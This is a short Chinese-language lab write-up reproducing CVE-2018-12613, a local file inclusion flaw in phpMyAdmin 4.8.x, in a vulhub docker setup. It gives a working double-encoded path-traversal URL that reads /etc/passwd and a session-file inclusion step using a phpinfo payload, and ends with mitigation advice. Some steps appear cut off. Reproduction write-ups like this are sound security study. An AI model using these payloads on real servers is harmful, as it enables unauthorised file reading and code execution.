目录
漏洞描述
PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。
在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。
受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。
漏洞复现
??? 使用docker搭建vulhub平台,
运行以下命令启动phpMyadmin4.8.1
docker-compose up -d
环境启动后,访问http://your-ip:8080. phpmyadmin 是“config”模式,所以我们可以直接登录。
复现
访问地址
显示结果:
访问地址
http://ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
结果表明存在文件包含漏洞:
我们可以执行SELECT '<?=phpinfo()?>';,
?
检查session id(cookie 中phpMyAdmin的值)
包含 session 文件:
解决方法
- 更新phpmyadmin版本。
- 删除index.php中使用文件包含的函数。
- 进行输入转码和过滤拦截敏感字符。
- 安装杀毒软件,开启防火墙拦截异常行为。